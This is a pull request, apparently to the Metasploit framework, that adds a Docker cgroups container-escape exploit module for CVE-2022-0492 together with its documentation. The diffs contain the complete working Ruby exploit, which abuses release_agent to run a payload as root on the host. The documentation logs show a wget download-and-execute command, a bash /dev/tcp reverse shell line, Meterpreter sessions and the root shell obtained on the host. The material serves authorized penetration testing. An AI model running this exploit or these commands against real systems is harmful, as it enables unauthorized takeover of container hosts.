### PR TITLE
Docker cgroup escape (CVE-2022-0492)

### DIFF
--- a/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
@@ -3,13 +3,13 @@
 This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
 If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
 
-A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
-This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
+A vulnerability was found in the Linux kernel's `cgroup_release_agent_write` in the `kernel/cgroup/cgroup-v1.c` function.
+This flaw, under certain circumstances, allows the use of the cgroups v1 `release_agent` feature to escalate privileges
 and bypass the namespace isolation unexpectedly.
 
-More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
-If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
-an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
+More simply put, cgroups v1 has a feature called `release_agent` that runs a program when a process in the cgroup terminates.
+If `notify_on_release` is enabled, the kernel runs the `release_agent` binary as root. By editing the release_agent file,
+an attacker can execute their own binary with elevated privileges, taking control of the system. However, the `release_agent`
 file is owned by root, so only a user with root access can modify it.
 
 ### Docker Setup

--- a/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
@@ -1,0 +1,110 @@
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+### Docker Setup
+
+`sudo docker run --rm -it --privileged ubuntu:20.04 bash`
+
+You may want to install `wget` to make initial exploitation easier as well:
+
+```
+apt-get update
+apt-get install -y wget
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell on teh host OS.
+
+## Options
+
+## Scenarios
+
+### Ubuntu 18.04 LTS with 4.15.0-96-generic kernel and Docker Ubuntu 20.04
+
+Initial Access
+
+```
+resource (docker.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (docker.rb)> set lhost 192.168.2.128
+lhost => 192.168.2.128
+resource (docker.rb)> set srvport 8181
+srvport => 8181
+resource (docker.rb)> set target 7
+target => 7
+resource (docker.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (docker.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 192.168.2.128:4444 
+[*] Using URL: http://192.168.2.128:8181/QZWpVr8t
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO dLFtachL --no-check-certificate http://192.168.2.128:8181/QZWpVr8t; chmod +x dLFtachL; ./dLFtachL& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] 192.168.2.142    web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.2.142
+[*] Meterpreter session 1 opened (192.168.2.128:4444 -> 192.168.2.142:60288) at 2023-11-28 13:38:39 -0500
+
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/) > getuid
+Server username: root
+(Meterpreter 1)(/) > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 4.15.0-96-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+Exploit the Docker Escape
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/docker_cgroup_escape
+[*] Using configured payload cmd/unix/reverse_bash
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lhost 192.168.2.128
+lhost => 192.168.2.128
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lport 9988
+lport => 9988
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > run
+
+[+] bash -c '0<&119-;exec 119<>/dev/tcp/192.168.2.128/9988;sh <&119 >&119 2>&119'
+[*] Started reverse TCP handler on 192.168.2.128:9988 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Unable to determine host OS, this check method is unlikely to be accurate
+[+] The target is vulnerable. IF host OS is Ubuntu, kernel version 4.15.0-96-generic is vulnerable
+[*] Creating folder for mount: /tmp/2YwVP2oT
+[*] Creating directory /tmp/2YwVP2oT
+[*] /tmp/2YwVP2oT created
+[*] Mounting cgroup
+[*] Creating folder in cgroup for exploitation: /tmp/2YwVP2oT/Fm9TGx9u
+[*] Creating directory /tmp/2YwVP2oT/Fm9TGx9u
+[*] /tmp/2YwVP2oT/Fm9TGx9u created
+[*] Enabling notify on release for group Fm9TGx9u
+[*] Determining the host OS path for image
+[*] Host OS path for image: /var/lib/docker/overlay2/36581ed54878bb921fc79b1bbabef2839159544353837e0bbf8b98e49bb16e3d/diff
+[*] Setting release_agent path to: /var/lib/docker/overlay2/36581ed54878bb921fc79b1bbabef2839159544353837e0bbf8b98e49bb16e3d/diff/tmp/TAPu7Lsjq
+[*] Uploading payload to /tmp/TAPu7Lsjq
+[*] Writing '/tmp/TAPu7Lsjq' (72 bytes) ...
+[*] Triggering payload
+sh -c "echo $$ > /tmp/2YwVP2oT/Fm9TGx9u/cgroup.procs"
+
+[*] Cleanup: Unmounting /tmp/2YwVP2oT
+[*] Exploit completed, but no session was created.
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > 
+```

--- a/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
@@ -36,7 +36,7 @@ apt-get install -y wget
 5. Do: `set lhost [ip]`
 6. Do: `set session [#]`
 7. Do: `run`
-2. You should get a root shell on the host OS.
+8. You should get a root shell on the host OS.
 
 ## Options
 

--- a/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
+++ b/documentation/modules/exploit/linux/local/docker_cgroup_escape.md
@@ -1,12 +1,24 @@
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
+If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
+
+A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
+This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
+and bypass the namespace isolation unexpectedly.
+
+More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
+If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
+an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
+file is owned by root, so only a user with root access can modify it.
 
 ### Docker Setup
 
 `sudo docker run --rm -it --privileged ubuntu:20.04 bash`
+
+or
+
+`sudo docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu:20.04 bash`
 
 You may want to install `wget` to make initial exploitation easier as well:
 
@@ -17,11 +29,14 @@ apt-get install -y wget
 
 ## Verification Steps
 
-1. Install the application
-1. Start msfconsole
-1. Do: `use [module path]`
-1. Do: `run`
-1. You should get a shell on teh host OS.
+1. Install Docker and start a docker container
+2. Start msfconsole
+3. Get a shell on the docker image as root. 
+4. Do: `use exploit/linux/local/docker_cgroup_escape`
+5. Do: `set lhost [ip]`
+6. Do: `set session [#]`
+7. Do: `run`
+2. You should get a root shell on the host OS.
 
 ## Options
 
@@ -34,8 +49,8 @@ Initial Access
 ```
 resource (docker.rb)> use exploit/multi/script/web_delivery
 [*] Using configured payload python/meterpreter/reverse_tcp
-resource (docker.rb)> set lhost 192.168.2.128
-lhost => 192.168.2.128
+resource (docker.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
 resource (docker.rb)> set srvport 8181
 srvport => 8181
 resource (docker.rb)> set target 7
@@ -45,15 +60,15 @@ payload => linux/x64/meterpreter/reverse_tcp
 resource (docker.rb)> run
 [*] Exploit running as background job 0.
 [*] Exploit completed, but no session was created.
-[*] Started reverse TCP handler on 192.168.2.128:4444 
-[*] Using URL: http://192.168.2.128:8181/QZWpVr8t
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/QZWpVr8t
 [*] Server started.
 [*] Run the following command on the target machine:
-wget -qO dLFtachL --no-check-certificate http://192.168.2.128:8181/QZWpVr8t; chmod +x dLFtachL; ./dLFtachL& disown
+wget -qO dLFtachL --no-check-certificate http://1.1.1.1:8181/QZWpVr8t; chmod +x dLFtachL; ./dLFtachL& disown
 [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
-[*] 192.168.2.142    web_delivery - Delivering Payload (250 bytes)
-[*] Sending stage (3045380 bytes) to 192.168.2.142
-[*] Meterpreter session 1 opened (192.168.2.128:4444 -> 192.168.2.142:60288) at 2023-11-28 13:38:39 -0500
+[*] 2.2.2.2    web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60288) at 2023-11-28 13:38:39 -0500
 
 [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
 [*] Starting interaction with 1...
@@ -73,8 +88,8 @@ Exploit the Docker Escape
 ```
 [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/docker_cgroup_escape
 [*] Using configured payload cmd/unix/reverse_bash
-[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lhost 192.168.2.128
-lhost => 192.168.2.128
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lhost 1.1.1.1
+lhost => 1.1.1.1
 [msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lport 9988
 lport => 9988
 [msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set verbose true
@@ -83,28 +98,42 @@ verbose => true
 session => 1
 [msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > run
 
-[+] bash -c '0<&119-;exec 119<>/dev/tcp/192.168.2.128/9988;sh <&119 >&119 2>&119'
-[*] Started reverse TCP handler on 192.168.2.128:9988 
+[+] bash -c '0<&181-;exec 181<>/dev/tcp/1.1.1.1/9988;sh <&181 >&181 2>&181'
+[*] Started reverse TCP handler on 1.1.1.1:9988 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Unable to determine host OS, this check method is unlikely to be accurate
+[*] Unable to determine host OS, this check method is unlikely to be accurate if the host isn't Ubuntu
 [+] The target is vulnerable. IF host OS is Ubuntu, kernel version 4.15.0-96-generic is vulnerable
-[*] Creating folder for mount: /tmp/2YwVP2oT
-[*] Creating directory /tmp/2YwVP2oT
-[*] /tmp/2YwVP2oT created
+[*] Creating folder for mount: /tmp/eH7EY
+[*] Creating directory /tmp/eH7EY
+[*] /tmp/eH7EY created
 [*] Mounting cgroup
-[*] Creating folder in cgroup for exploitation: /tmp/2YwVP2oT/Fm9TGx9u
-[*] Creating directory /tmp/2YwVP2oT/Fm9TGx9u
-[*] /tmp/2YwVP2oT/Fm9TGx9u created
-[*] Enabling notify on release for group Fm9TGx9u
+[*] Creating folder in cgroup for exploitation: /tmp/eH7EY/qe0oj7G
+[*] Creating directory /tmp/eH7EY/qe0oj7G
+[*] /tmp/eH7EY/qe0oj7G created
+[*] Enabling notify on release for group qe0oj7G
 [*] Determining the host OS path for image
-[*] Host OS path for image: /var/lib/docker/overlay2/36581ed54878bb921fc79b1bbabef2839159544353837e0bbf8b98e49bb16e3d/diff
-[*] Setting release_agent path to: /var/lib/docker/overlay2/36581ed54878bb921fc79b1bbabef2839159544353837e0bbf8b98e49bb16e3d/diff/tmp/TAPu7Lsjq
-[*] Uploading payload to /tmp/TAPu7Lsjq
-[*] Writing '/tmp/TAPu7Lsjq' (72 bytes) ...
-[*] Triggering payload
-sh -c "echo $$ > /tmp/2YwVP2oT/Fm9TGx9u/cgroup.procs"
+[*] Host OS path for image: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff
+[*] Setting release_agent path to: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff/tmp/KksBaCbF
+[*] Uploading payload to /tmp/KksBaCbF
+[*] Writing '/tmp/KksBaCbF' (88 bytes) ...
+[*] Triggering payload with command: sh -c "echo $$ > /tmp/eH7EY/qe0oj7G/cgroup.procs"
+[*] Command shell session 2 opened (1.1.1.1:9988 -> 2.2.2.2:54990) at 2023-11-28 14:39:10 -0500
+[*] Cleanup: Unmounting /tmp/eH7EY
 
-[*] Cleanup: Unmounting /tmp/2YwVP2oT
-[*] Exploit completed, but no session was created.
-[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > 
+FDjfSpoVnqvGmrtBOSRfABBgFMmcSkbT
+id
+uid=0(root) gid=0(root) groups=0(root)
+cat /etc/os-release
+NAME="Ubuntu"
+VERSION="18.04 LTS (Bionic Beaver)"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 18.04 LTS"
+VERSION_ID="18.04"
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+VERSION_CODENAME=bionic
+UBUNTU_CODENAME=bionic
 ```

--- a/modules/exploits/linux/local/docker_cgroup_escape.rb
+++ b/modules/exploits/linux/local/docker_cgroup_escape.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
+  include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
   prepend Msf::Exploit::Remote::AutoCheck
@@ -39,11 +40,9 @@ class MetasploitModule < Msf::Exploit::Local
           'T1erno', # POC
         ],
         'Platform' => [ 'unix', 'linux' ],
-        'Arch' => ARCH_CMD,
         'SessionTypes' => ['meterpreter'],
-        'Targets' => [[ 'Auto', {} ]],
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/unix/reverse_bash'
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
         },
         'Privileged' => true,
         'References' => [
@@ -59,6 +58,10 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'CVE', '2022-0492']
         ],
         'DisclosureDate' => '2022-02-04',
+        'Targets' => [
+          ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],
+          ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]
+        ],
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -103,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_status("Creating folder for mount: #{@mount_dir}")
     mkdir(@mount_dir)
     print_status('Mounting cgroup')
-    cmd_exec("mount -t cgroup -o rdma cgroup #{@mount_dir}")
+    cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")
     group = rand_text_alphanumeric(5..10)
     group_full_dir = "#{@mount_dir}/#{group}"
     vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")
@@ -138,18 +141,22 @@ class MetasploitModule < Msf::Exploit::Local
     write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"
 
     print_status("Uploading payload to #{payload_path}")
-    # for whatever reason it's unhappy and wont run without the /bin/sh header
-    upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"
+    if target.name == 'CMD'
+      # for whatever reason it's unhappy and wont run without the /bin/sh header
+      upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"
+    elsif target.name == 'BINARY'
+      upload_and_chmodx payload_path, generate_payload_exe
+    end
     register_files_for_cleanup(payload_path)
 
     print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")
-    cmd_exec(%(sh -c "echo \$\$ > #{group_full_dir}/cgroup.procs"))
+    cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))
   end
 
   def cleanup
     if @mount_dir
       vprint_status("Cleanup: Unmounting #{@mount_dir}")
-      cmd_exec("umount #{@mount_dir}")
+      cmd_exec("umount '#{@mount_dir}'")
     end
     super
   end

--- a/modules/exploits/linux/local/docker_cgroup_escape.rb
+++ b/modules/exploits/linux/local/docker_cgroup_escape.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
 
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::Kernel
@@ -19,8 +19,17 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Docker cgroups Container Escape',
         'Description' => %q{
-          This exploit module illustrates how a vulnerability could be exploited
-          in an linux command for priv esc.
+          This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
+          If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
+
+          A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
+          This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
+          and bypass the namespace isolation unexpectedly.
+
+          More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
+          If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
+          an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
+          file is owned by root, so only a user with root access can modify it.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -51,11 +60,10 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'DisclosureDate' => '2022-02-04',
         'DefaultTarget' => 0,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
         'Notes' => {
-          'Stability' => [],
-          'Reliability' => [],
-          'SideEffects' => []
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )
@@ -65,11 +73,11 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def base_dir
-    datastore['WritableDir'].to_s
+    datastore['WritableDir']
   end
 
   def check
-    print_status('Unable to determine host OS, this check method is unlikely to be accurate')
+    print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')
     release = kernel_release
     # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492
     release_short = Rex::Version.new(release.split('-').first)
@@ -86,19 +94,17 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     # Check if we're already root as its required
-    unless is_root?
-      fail_with(Failure::NoAccess,
-                'The exploit needs a session as root (uid 0) inside the container')
-    end
+    fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?
 
     # create mount
-    @mount_dir = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
+    folder = rand_text_alphanumeric(5..10)
+    @mount_dir = "#{base_dir}/#{folder}"
     register_dir_for_cleanup(@mount_dir)
     vprint_status("Creating folder for mount: #{@mount_dir}")
     mkdir(@mount_dir)
     print_status('Mounting cgroup')
     cmd_exec("mount -t cgroup -o rdma cgroup #{@mount_dir}")
-    group = rand_text_alphanumeric(5..10).to_s
+    group = rand_text_alphanumeric(5..10)
     group_full_dir = "#{@mount_dir}/#{group}"
     vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")
     mkdir(group_full_dir)
@@ -123,33 +129,28 @@ class MetasploitModule < Msf::Exploit::Local
       break
     end
 
-    fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.empty? || host_path.nil? || host_path.start_with?('sed') # start_with catches repeat of command
+    fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command
 
     vprint_status("Host OS path for image: #{host_path}")
 
     payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
     print_status("Setting release_agent path to: #{host_path}#{payload_path}")
-    cmd_exec("echo \"#{host_path}#{payload_path}\" > #{@mount_dir}/release_agent")
+    write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"
 
     print_status("Uploading payload to #{payload_path}")
-    write_file(payload_path, payload.encoded)
-    # cmd_exec("echo \"#{payload.encoded}\" > #{payload_path}")
-    # cmd_exec("chmod a+x #{payload_path}")
-    upload_and_chmodx payload_path, payload.encoded
+    # for whatever reason it's unhappy and wont run without the /bin/sh header
+    upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"
     register_files_for_cleanup(payload_path)
 
-    print_status('Triggering payload')
-    puts %(sh -c "echo \$\$ > #{group_full_dir}/cgroup.procs")
-    puts cmd_exec(%(sh -c "echo \$\$ > #{group_full_dir}/cgroup.procs"))
+    print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")
+    cmd_exec(%(sh -c "echo \$\$ > #{group_full_dir}/cgroup.procs"))
   end
 
   def cleanup
     if @mount_dir
       vprint_status("Cleanup: Unmounting #{@mount_dir}")
-      # XXX
-      # cmd_exec("umount #{@mount_dir}")
+      cmd_exec("umount #{@mount_dir}")
     end
-    # XXX
-    # super
+    super
   end
 end

--- a/modules/exploits/linux/local/docker_cgroup_escape.rb
+++ b/modules/exploits/linux/local/docker_cgroup_escape.rb
@@ -1,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Docker cgroups Container Escape',
+        'Description' => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+          in an linux command for priv esc.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Yiqi Sun', # discovery
+          'Kevin Wang', # discovery
+          'T1erno', # POC
+        ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [[ 'Auto', {} ]],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+        },
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],
+          [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
+          [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],
+          [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],
+          [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],
+          [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],
+          [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],
+          [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],
+          [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],
+          [ 'CVE', '2022-0492']
+        ],
+        'DisclosureDate' => '2022-02-04',
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    print_status('Unable to determine host OS, this check method is unlikely to be accurate')
+    release = kernel_release
+    # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492
+    release_short = Rex::Version.new(release.split('-').first)
+    release_long = Rex::Version.new(release.split('-')[0..1].join('-'))
+    if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10
+       release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS
+       release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS
+       release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM
+      return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")
+    end
+
+    CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")
+  end
+
+  def exploit
+    # Check if we're already root as its required
+    unless is_root?
+      fail_with(Failure::NoAccess,
+                'The exploit needs a session as root (uid 0) inside the container')
+    end
+
+    # create mount
+    @mount_dir = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
+    register_dir_for_cleanup(@mount_dir)
+    vprint_status("Creating folder for mount: #{@mount_dir}")
+    mkdir(@mount_dir)
+    print_status('Mounting cgroup')
+    cmd_exec("mount -t cgroup -o rdma cgroup #{@mount_dir}")
+    group = rand_text_alphanumeric(5..10).to_s
+    group_full_dir = "#{@mount_dir}/#{group}"
+    vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")
+    mkdir(group_full_dir)
+
+    print_status("Enabling notify on release for group #{group}")
+    write_file("#{group_full_dir}/notify_on_release", '1')
+
+    print_status('Determining the host OS path for image')
+    # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of
+    mtab_file = read_file('/etc/mtab')
+    host_path = nil
+    mtab_file.each_line do |line|
+      next unless line.start_with?('overlay') && line.include?('perdir') # upperdir
+
+      line.split(',').each do |parameter|
+        next unless parameter.start_with?('upperdir')
+
+        parameter = parameter.split('=')
+        fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1
+        host_path = parameter[1]
+      end
+      break
+    end
+
+    fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.empty? || host_path.nil? || host_path.start_with?('sed') # start_with catches repeat of command
+
+    vprint_status("Host OS path for image: #{host_path}")
+
+    payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
+    print_status("Setting release_agent path to: #{host_path}#{payload_path}")
+    cmd_exec("echo \"#{host_path}#{payload_path}\" > #{@mount_dir}/release_agent")
+
+    print_status("Uploading payload to #{payload_path}")
+    write_file(payload_path, payload.encoded)
+    # cmd_exec("echo \"#{payload.encoded}\" > #{payload_path}")
+    # cmd_exec("chmod a+x #{payload_path}")
+    upload_and_chmodx payload_path, payload.encoded
+    register_files_for_cleanup(payload_path)
+
+    print_status('Triggering payload')
+    puts %(sh -c "echo \$\$ > #{group_full_dir}/cgroup.procs")
+    puts cmd_exec(%(sh -c "echo \$\$ > #{group_full_dir}/cgroup.procs"))
+  end
+
+  def cleanup
+    if @mount_dir
+      vprint_status("Cleanup: Unmounting #{@mount_dir}")
+      # XXX
+      # cmd_exec("umount #{@mount_dir}")
+    end
+    # XXX
+    # super
+  end
+end


### PR DESCRIPTION
This PR adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

## Verification

- [ ] Install Docker and start a docker container
- [ ] Start msfconsole
- [ ] Get a shell on the docker image as root. 
- [ ] Do: `use exploit/linux/local/docker_cgroup_escape`
- [ ] Do: `set lhost [ip]`
- [ ] Do: `set session [#]`
- [ ] Do: `run`
- [ ] You should get a root shell on the host OS.